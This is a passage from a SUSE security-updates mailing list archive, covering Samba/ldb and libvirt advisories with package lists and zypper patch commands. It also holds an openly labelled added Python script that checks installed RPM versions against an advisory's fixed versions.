References:         #1114407 #1124223 #1125410 #1126377 #1131060 #1131686
Cross-References:   CVE-2019-3880
Affected Products:
                    SUSE Linux Enterprise Module for Packagehub Subpackages 15
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Development Tools 15
                    SUSE Linux Enterprise Module for Desktop Applications 15
                    SUSE Linux Enterprise Module for Basesystem 15
                    SUSE Linux Enterprise High Availability 15
______________________________________________________________________________

   An update that solves one vulnerability and has 5 fixes is now available.

Description:

   This update for samba fixes the following issues:

   Security issue fixed:

   - CVE-2019-3880: Fixed a path/symlink traversal vulnerability that allowed
     an unprivileged user to save registry files outside a share (bsc#1131060).

   ldb was updated to version 1.2.4 (bsc#1125410 bsc#1131686):

   - Fixed an out-of-bounds read in ldb_wildcard_compare.
   - Hold at most 10 outstanding paged result cookies.
   - Put "results_store" into a doubly linked list.
   - Refuse to build Samba against a newer minor version of ldb.

   Non-security issues fixed:

   - Fixed the update-apparmor-samba-profile script after AppArmor switched to
     named profiles (bsc#1126377).
   - Honor the load_printers parameter in smb.conf (bsc#1124223).
   - Provide the 32-bit samba winbind PAM module and the 32-bit libraries it
     depends on.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Packagehub Subpackages 15:

      zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-2019-1040=1

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:

      zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1040=1

   - SUSE Linux Enterprise Module for Development Tools 15:

      zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-1040=1

   - SUSE Linux Enterprise Module for Desktop Applications 15:

      zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1040=1

   - SUSE Linux Enterprise Module for Basesystem 15:

      zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1040=1

   - SUSE Linux Enterprise High Availability 15:

      zypper in -t patch SUSE-SLE-Product-HA-15-2019-1040=1

Package List:

   - SUSE Linux Enterprise Module for Packagehub Subpackages 15 (aarch64 ppc64le s390x x86_64):

      avahi-debuginfo-0.6.32-5.5.3
      avahi-debugsource-0.6.32-5.5.3
      python-avahi-0.6.32-5.5.3
      samba-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-debugsource-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-python-4.7.11+git.153.b36ceaf2235-4.27.1

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):

      avahi-debuginfo-0.6.32-5.5.3
      avahi-debugsource-0.6.32-5.5.3
      avahi-glib2-debugsource-0.6.32-5.5.8
      ctdb-pcp-pmda-4.7.11+git.153.b36ceaf2235-4.27.1
      ctdb-pcp-pmda-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      ctdb-tests-4.7.11+git.153.b36ceaf2235-4.27.1
      ctdb-tests-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      gnutls-debuginfo-3.6.2-6.5.4
      gnutls-debugsource-3.6.2-6.5.4
      gnutls-guile-3.6.2-6.5.4
      gnutls-guile-debuginfo-3.6.2-6.5.4
      ldb-debugsource-1.2.4-3.12.1
      ldb-tools-1.2.4-3.12.1
      ldb-tools-debuginfo-1.2.4-3.12.1
      libnettle-debugsource-3.4.1-4.9.1
      nettle-3.4.1-4.9.1
      nettle-debuginfo-3.4.1-4.9.1
      python-avahi-0.6.32-5.5.3
      python-avahi-gtk-0.6.32-5.5.8
      python-tdb-1.3.15-3.6.3
      python-tdb-debuginfo-1.3.15-3.6.3
      python-tevent-0.9.36-4.10.3
      python-tevent-debuginfo-0.9.36-4.10.3
      python3-tdb-1.3.15-3.6.3
      python3-tdb-debuginfo-1.3.15-3.6.3
      python3-tevent-0.9.36-4.10.3
      python3-tevent-debuginfo-0.9.36-4.10.3
      samba-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-debugsource-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-python-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-test-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-test-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      tdb-debugsource-1.3.15-3.6.3
      tevent-debugsource-0.9.36-4.10.3

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (x86_64):

      libnettle-devel-32bit-3.4.1-4.9.1

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch):

      samba-doc-4.7.11+git.153.b36ceaf2235-4.27.1

   - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64):

      cups-ddk-2.2.7-3.11.7
      cups-ddk-debuginfo-2.2.7-3.11.7
      cups-debuginfo-2.2.7-3.11.7
      cups-debugsource-2.2.7-3.11.7

   - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):

      avahi-autoipd-0.6.32-5.5.3
      avahi-autoipd-debuginfo-0.6.32-5.5.3
      avahi-debuginfo-0.6.32-5.5.3
      avahi-debugsource-0.6.32-5.5.3
      avahi-glib2-debugsource-0.6.32-5.5.8
      avahi-utils-gtk-0.6.32-5.5.8
      avahi-utils-gtk-debuginfo-0.6.32-5.5.8
      libavahi-gobject-devel-0.6.32-5.5.8

   - SUSE Linux Enterprise Module for Desktop Applications 15 (x86_64):

      avahi-32bit-debuginfo-0.6.32-5.5.3
      cups-debugsource-2.2.7-3.11.7
      gnutls-debugsource-3.6.2-6.5.4
      libavahi-client3-32bit-0.6.32-5.5.3
      libavahi-client3-32bit-debuginfo-0.6.32-5.5.3
      libavahi-common3-32bit-0.6.32-5.5.3
      libavahi-common3-32bit-debuginfo-0.6.32-5.5.3
      libcups2-32bit-2.2.7-3.11.7
      libcups2-32bit-debuginfo-2.2.7-3.11.7
      libgnutls30-32bit-3.6.2-6.5.4
      libgnutls30-32bit-debuginfo-3.6.2-6.5.4
      libhogweed4-32bit-3.4.1-4.9.1
      libhogweed4-32bit-debuginfo-3.4.1-4.9.1
      libnettle-debugsource-3.4.1-4.9.1
      libnettle6-32bit-3.4.1-4.9.1
      libnettle6-32bit-debuginfo-3.4.1-4.9.1
      libp11-kit0-32bit-0.23.2-4.2.1
      libp11-kit0-32bit-debuginfo-0.23.2-4.2.1
      libtasn1-6-32bit-4.13-4.2.1
      libtasn1-6-32bit-debuginfo-4.13-4.2.1
      libtasn1-debugsource-4.13-4.2.1
      p11-kit-32bit-debuginfo-0.23.2-4.2.1
      p11-kit-debugsource-0.23.2-4.2.1

   - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

      avahi-0.6.32-5.5.3
      avahi-compat-howl-devel-0.6.32-5.5.3
      avahi-compat-mDNSResponder-devel-0.6.32-5.5.3
      avahi-debuginfo-0.6.32-5.5.3
      avahi-debugsource-0.6.32-5.5.3
      avahi-glib2-debugsource-0.6.32-5.5.8
      avahi-utils-0.6.32-5.5.3
      avahi-utils-debuginfo-0.6.32-5.5.3
      cups-2.2.7-3.11.7
      cups-client-2.2.7-3.11.7
      cups-client-debuginfo-2.2.7-3.11.7
      cups-config-2.2.7-3.11.7
      cups-debuginfo-2.2.7-3.11.7
      cups-debugsource-2.2.7-3.11.7
      cups-devel-2.2.7-3.11.7
      gamin-devel-0.1.10-3.2.3
      gamin-devel-debugsource-0.1.10-3.2.3
      gnutls-3.6.2-6.5.4
      gnutls-debuginfo-3.6.2-6.5.4
      gnutls-debugsource-3.6.2-6.5.4
      ldb-debugsource-1.2.4-3.12.1
      libavahi-client3-0.6.32-5.5.3
      libavahi-client3-debuginfo-0.6.32-5.5.3
      libavahi-common3-0.6.32-5.5.3
      libavahi-common3-debuginfo-0.6.32-5.5.3
      libavahi-core7-0.6.32-5.5.3
      libavahi-core7-debuginfo-0.6.32-5.5.3
      libavahi-devel-0.6.32-5.5.3
      libavahi-glib-devel-0.6.32-5.5.8
      libavahi-glib1-0.6.32-5.5.8
      libavahi-glib1-debuginfo-0.6.32-5.5.8
      libavahi-gobject0-0.6.32-5.5.8
      libavahi-gobject0-debuginfo-0.6.32-5.5.8
      libavahi-ui-gtk3-0-0.6.32-5.5.8
      libavahi-ui-gtk3-0-debuginfo-0.6.32-5.5.8
      libavahi-ui0-0.6.32-5.5.8
      libavahi-ui0-debuginfo-0.6.32-5.5.8
      libcups2-2.2.7-3.11.7
      libcups2-debuginfo-2.2.7-3.11.7
      libcupscgi1-2.2.7-3.11.7
      libcupscgi1-debuginfo-2.2.7-3.11.7
      libcupsimage2-2.2.7-3.11.7
      libcupsimage2-debuginfo-2.2.7-3.11.7
      libcupsmime1-2.2.7-3.11.7
      libcupsmime1-debuginfo-2.2.7-3.11.7
      libcupsppdc1-2.2.7-3.11.7
      libcupsppdc1-debuginfo-2.2.7-3.11.7
      libdcerpc-binding0-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc-binding0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc-samr-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc-samr0-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc-samr0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc0-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libdns_sd-0.6.32-5.5.3
      libdns_sd-debuginfo-0.6.32-5.5.3
      libfam0-gamin-0.1.10-3.2.3
      libfam0-gamin-debuginfo-0.1.10-3.2.3
      libgamin-1-0-0.1.10-3.2.3
      libgamin-1-0-debuginfo-0.1.10-3.2.3
      libgnutls-devel-3.6.2-6.5.4
      libgnutls30-3.6.2-6.5.4
      libgnutls30-debuginfo-3.6.2-6.5.4
      libgnutlsxx-devel-3.6.2-6.5.4
      libgnutlsxx28-3.6.2-6.5.4
      libgnutlsxx28-debuginfo-3.6.2-6.5.4
      libhogweed4-3.4.1-4.9.1
      libhogweed4-debuginfo-3.4.1-4.9.1
      libhowl0-0.6.32-5.5.3
      libhowl0-debuginfo-0.6.32-5.5.3
      libldb-devel-1.2.4-3.12.1
      libldb1-1.2.4-3.12.1
      libldb1-debuginfo-1.2.4-3.12.1
      libndr-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-krb5pac-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-krb5pac0-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-krb5pac0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-nbt-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-nbt0-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-nbt0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-standard-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-standard0-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-standard0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr0-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libnetapi-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libnetapi0-4.7.11+git.153.b36ceaf2235-4.27.1
      libnetapi0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libnettle-debugsource-3.4.1-4.9.1
      libnettle-devel-3.4.1-4.9.1
      libnettle6-3.4.1-4.9.1
      libnettle6-debuginfo-3.4.1-4.9.1
      libp11-kit0-0.23.2-4.2.1
      libp11-kit0-debuginfo-0.23.2-4.2.1
      libsamba-credentials-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-credentials0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-credentials0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-errors-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-errors0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-errors0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-hostconfig-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-hostconfig0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-hostconfig0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-passdb-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-passdb0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-passdb0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-policy-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-policy0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-util-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-util0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-util0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamdb-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamdb0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamdb0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbclient-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbclient0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbclient0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbconf-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbconf0-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbconf0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbldap-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbldap2-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbldap2-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libtalloc-devel-2.1.11-3.5.3
      libtalloc2-2.1.11-3.5.3
      libtalloc2-debuginfo-2.1.11-3.5.3
      libtasn1-4.13-4.2.1
      libtasn1-6-4.13-4.2.1
      libtasn1-6-debuginfo-4.13-4.2.1
      libtasn1-debuginfo-4.13-4.2.1
      libtasn1-debugsource-4.13-4.2.1
      libtasn1-devel-4.13-4.2.1
      libtdb-devel-1.3.15-3.6.3
      libtdb1-1.3.15-3.6.3
      libtdb1-debuginfo-1.3.15-3.6.3
      libtevent-devel-0.9.36-4.10.3
      libtevent-util-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libtevent-util0-4.7.11+git.153.b36ceaf2235-4.27.1
      libtevent-util0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libtevent0-0.9.36-4.10.3
      libtevent0-debuginfo-0.9.36-4.10.3
      libwbclient-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      libwbclient0-4.7.11+git.153.b36ceaf2235-4.27.1
      libwbclient0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      p11-kit-0.23.2-4.2.1
      p11-kit-debuginfo-0.23.2-4.2.1
      p11-kit-debugsource-0.23.2-4.2.1
      p11-kit-devel-0.23.2-4.2.1
      p11-kit-nss-trust-0.23.2-4.2.1
      p11-kit-tools-0.23.2-4.2.1
      p11-kit-tools-debuginfo-0.23.2-4.2.1
      python-ldb-1.2.4-3.12.1
      python-ldb-debuginfo-1.2.4-3.12.1
      python-ldb-devel-1.2.4-3.12.1
      python-talloc-2.1.11-3.5.3
      python-talloc-debuginfo-2.1.11-3.5.3
      python-talloc-devel-2.1.11-3.5.3
      python3-ldb-1.2.4-3.12.1
      python3-ldb-debuginfo-1.2.4-3.12.1
      python3-ldb-devel-1.2.4-3.12.1
      python3-talloc-2.1.11-3.5.3
      python3-talloc-debuginfo-2.1.11-3.5.3
      python3-talloc-devel-2.1.11-3.5.3
      samba-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-client-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-client-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-core-devel-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-debugsource-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-libs-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-libs-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-winbind-4.7.11+git.153.b36ceaf2235-4.27.1
      samba-winbind-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      talloc-debugsource-2.1.11-3.5.3
      talloc-man-2.1.11-3.5.3
      tdb-debugsource-1.3.15-3.6.3
      tdb-tools-1.3.15-3.6.3
      tdb-tools-debuginfo-1.3.15-3.6.3
      tevent-debugsource-0.9.36-4.10.3
      tevent-man-0.9.36-4.10.3
      typelib-1_0-Avahi-0_6-0.6.32-5.5.8

   - SUSE Linux Enterprise Module for Basesystem 15 (x86_64):

      libavahi-client3-32bit-0.6.32-5.5.3
      libavahi-client3-32bit-debuginfo-0.6.32-5.5.3
      libavahi-common3-32bit-0.6.32-5.5.3
      libavahi-common3-32bit-debuginfo-0.6.32-5.5.3
      libcups2-32bit-2.2.7-3.11.7
      libcups2-32bit-debuginfo-2.2.7-3.11.7
      libdcerpc-binding0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc-binding0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libdcerpc0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libfam0-gamin-32bit-0.1.10-3.2.3
      libfam0-gamin-32bit-debuginfo-0.1.10-3.2.3
      libgnutls30-32bit-3.6.2-6.5.4
      libgnutls30-32bit-debuginfo-3.6.2-6.5.4
      libhogweed4-32bit-3.4.1-4.9.1
      libhogweed4-32bit-debuginfo-3.4.1-4.9.1
      libldb1-32bit-1.2.4-3.12.1
      libldb1-32bit-debuginfo-1.2.4-3.12.1
      libndr-krb5pac0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-krb5pac0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-nbt0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-nbt0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-standard0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr-standard0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libndr0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libnetapi0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libnetapi0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libnettle6-32bit-3.4.1-4.9.1
      libnettle6-32bit-debuginfo-3.4.1-4.9.1
      libp11-kit0-32bit-0.23.2-4.2.1
      libp11-kit0-32bit-debuginfo-0.23.2-4.2.1
      libsamba-credentials0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-credentials0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-errors0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-errors0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-hostconfig0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-hostconfig0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-passdb0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-passdb0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-util0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamba-util0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamdb0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libsamdb0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbclient0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbclient0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbconf0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbconf0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1
      libsmbldap2-32bit-4.7.11+git.153.b36ceaf2235-4.27.1
libsmbldap2-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libtalloc2-32bit-2.1.11-3.5.3 libtalloc2-32bit-debuginfo-2.1.11-3.5.3 libtasn1-6-32bit-4.13-4.2.1 libtasn1-6-32bit-debuginfo-4.13-4.2.1 libtdb1-32bit-1.3.15-3.6.3 libtdb1-32bit-debuginfo-1.3.15-3.6.3 libtevent-util0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libtevent-util0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libtevent0-32bit-0.9.36-4.10.3 libtevent0-32bit-debuginfo-0.9.36-4.10.3 libwbclient0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libwbclient0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-client-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 samba-client-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-libs-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 samba-libs-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-winbind-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 samba-winbind-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1

   - SUSE Linux Enterprise Module for Basesystem 15 (noarch):
      avahi-lang-0.6.32-5.5.3

   - SUSE Linux Enterprise High Availability 15 (aarch64 ppc64le s390x x86_64):
      ctdb-4.7.11+git.153.b36ceaf2235-4.27.1 ctdb-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-debugsource-4.7.11+git.153.b36ceaf2235-4.27.1

References:

   https://www.suse.com/security/cve/CVE-2019-3880.html
   https://bugzilla.suse.com/1114407
   https://bugzilla.suse.com/1124223
   https://bugzilla.suse.com/1125410
   https://bugzilla.suse.com/1126377
   https://bugzilla.suse.com/1131060
   https://bugzilla.suse.com/1131686

From sle-security-updates at lists.suse.com Fri Apr 26 04:11:06 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 26 Apr 2019 12:11:06 +0200 (CEST)
Subject: SUSE-SU-2019:1042-1: moderate: Security update for libvirt
Message-ID: <20190426101106.10AC7F3DB@maintenance.suse.de>

SUSE Security Update: Security update for libvirt
______________________________________________________________________________
Announcement ID:    SUSE-SU-2019:1042-1
Rating:             moderate
References:         #1120813 #1126325 #1127458 #1131595 #1131955
Cross-References:   CVE-2019-3840 CVE-2019-3886
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Desktop 12-SP3
______________________________________________________________________________

   An update that solves two vulnerabilities and has three fixes is now available.

Description:

   This update for libvirt fixes the following issues:

   Security issues fixed:

   - CVE-2019-3840: Fixed a NULL pointer dereference in the virJSONValueObjectHasKey
     function, which could have resulted in a remote denial of service via the
     guest agent (bsc#1127458).
   - CVE-2019-3886: Fixed an information leak that allowed a read-only connection
     to retrieve the guest hostname (bsc#1131595).

   Other issues addressed:

   - cpu: add Skylake-Server and Skylake-Server-IBRS CPU models (FATE#327261, bsc#1131955).
   - libxl: save current memory value after successful balloon (bsc#1120813).
   - libxl: support Xen's max_grant_frames setting with the maxGrantFrames attribute
     on the xenbus controller (bsc#1126325).
   - conf: add new 'xenbus' controller type.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
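   Whichever installation method is used, the check an operator needs afterwards
   (or across a fleet, before deciding who still needs the patch) is whether each
   installed name-version-release already meets the fixed one listed in the
   advisory. The following Python script is an added example, not SUSE tooling:
   it pulls the fields an inventory check needs (announcement ID, CVEs, zypper
   patch names, package NEVRs) out of advisory text in the format used on this
   list, and compares an installed inventory against it using rpm's rpmvercmp
   ordering (numeric segments beat alphabetic ones, "~" sorts before the end of a
   label, "^" after it). The embedded advisory excerpt is a constructed,
   condensed copy of SUSE-SU-2019:1042-1 above; SAMPLE_INSTALLED is a made-up
   inventory that on a real host would come from
   rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}\n'.

```python
"""Added example (not SUSE tooling): check installed RPM NEVRs against a SUSE advisory.
SAMPLE_ADVISORY is a constructed, condensed copy of SUSE-SU-2019:1042-1 from this page;
SAMPLE_INSTALLED is a made-up inventory. Label ordering follows rpm's rpmvercmp."""
import re

SAMPLE_ADVISORY = """\
Announcement ID: SUSE-SU-2019:1042-1
Cross-References: CVE-2019-3840 CVE-2019-3886
- SUSE Linux Enterprise Server 12-SP3:
zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1042=1
Package List:
- SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):
libvirt-3.3.0-5.30.1
libvirt-daemon-3.3.0-5.30.1
libvirt-daemon-driver-qemu-3.3.0-5.30.1
libvirt-libs-3.3.0-5.30.1
"""
# Constructed inventory; on a real host: rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}\n'
SAMPLE_INSTALLED = ["libvirt-3.3.0-5.30.1",          # already at the fixed release
                    "libvirt-daemon-3.3.0-5.27.2",   # older release: still vulnerable
                    "libvirt-libs-3.3.0-5.30.1",
                    "openssh-7.2p2-74.48.1"]         # not shipped by this advisory

_NEVR_RE = re.compile(r"^(?P<name>.+)-(?:(?P<epoch>\d+):)?(?P<ver>[^-]+)-(?P<rel>[^-]+)$")
_TOKEN_RE = re.compile(r"[0-9]+|[A-Za-z]+|[~^]")  # rpm treats every other character as a separator

def rpmvercmp(a, b):
    """Return -1, 0 or 1, ordering two version or release labels the way rpm does."""
    ta, tb, i = _TOKEN_RE.findall(a), _TOKEN_RE.findall(b), 0
    while True:
        x = ta[i] if i < len(ta) else None
        y = tb[i] if i < len(tb) else None
        if "~" in (x, y):            # '~' sorts before anything, even the end of the label
            if x != y:
                return -1 if x == "~" else 1
        elif "^" in (x, y):          # '^' sorts after the end of the label, before any segment
            if x != y:
                if x is None or y is None:
                    return -1 if x is None else 1
                return 1 if y == "^" else -1
        elif x is None or y is None:
            break
        elif x.isdigit() != y.isdigit():   # a numeric segment is newer than an alphabetic one
            return 1 if x.isdigit() else -1
        elif x.isdigit() and int(x) != int(y):
            return 1 if int(x) > int(y) else -1
        elif not x.isdigit() and x != y:
            return 1 if x > y else -1
        i += 1
    # equal so far: the label with segments left over is the newer one
    return 0 if x is None and y is None else (1 if x is not None else -1)

def parse_nevr(nevr):
    """Split 'name-[epoch:]version-release' into (name, epoch, version, release)."""
    m = _NEVR_RE.match(nevr)
    if not m:
        raise ValueError("not a name-version-release string: %r" % nevr)
    return m["name"], int(m["epoch"] or 0), m["ver"], m["rel"]

def is_patched(installed, fixed):
    """True when the installed NEVR is at or above the fixed NEVR of the same package."""
    na, ea, va, ra = parse_nevr(installed)
    nb, eb, vb, rb = parse_nevr(fixed)
    if na != nb:
        raise ValueError("different packages: %s vs %s" % (na, nb))
    if ea != eb:
        return ea > eb
    return (rpmvercmp(va, vb) or rpmvercmp(ra, rb)) >= 0

def parse_advisory(text):
    """Pull announcement ID, CVEs, zypper patch names and package NEVRs out of advisory text."""
    info = {"id": None, "cves": [], "patches": [], "packages": []}
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("Announcement ID:"):
            info["id"] = line.split(":", 1)[1].strip()
        elif line.startswith("Cross-References:"):
            info["cves"] = re.findall(r"CVE-\d{4}-\d{4,}", line)
        elif line.startswith("zypper in -t patch "):
            info["patches"].append(line.split()[-1])
        elif " " not in line and _NEVR_RE.match(line):   # bare NEVR lines are package entries
            info["packages"].append(line)
    return info

def audit(advisory, installed):
    """Map every package the advisory ships to 'patched', 'vulnerable' or 'not installed'."""
    have = {parse_nevr(n)[0]: n for n in installed}
    result = {}
    for fixed in advisory["packages"]:
        name = parse_nevr(fixed)[0]
        if name not in have:
            result[name] = "not installed"
        else:
            result[name] = "patched" if is_patched(have[name], fixed) else "vulnerable"
    return result

if __name__ == "__main__":
    adv = parse_advisory(SAMPLE_ADVISORY)
    print(adv["id"], " ".join(adv["cves"]), "->", " ".join(adv["patches"]))
    for name, status in sorted(audit(adv, SAMPLE_INSTALLED).items()):
        print("%-28s %s" % (name, status))
```

   The comparison deliberately reimplements rpm's label ordering rather than
   comparing strings, because a release such as 5.30.1 must sort above 5.9.1
   and a pre-release marker such as 1.0~rc1 must sort below 1.0; a plain
   string or float comparison gets both wrong and reports hosts as patched
   that are not.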
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 12-SP3:
      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1042=1
   - SUSE Linux Enterprise Server 12-SP3:
      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1042=1
   - SUSE Linux Enterprise Desktop 12-SP3:
      zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1042=1

Package List:

   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):
      libvirt-debugsource-3.3.0-5.30.1 libvirt-devel-3.3.0-5.30.1

   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):
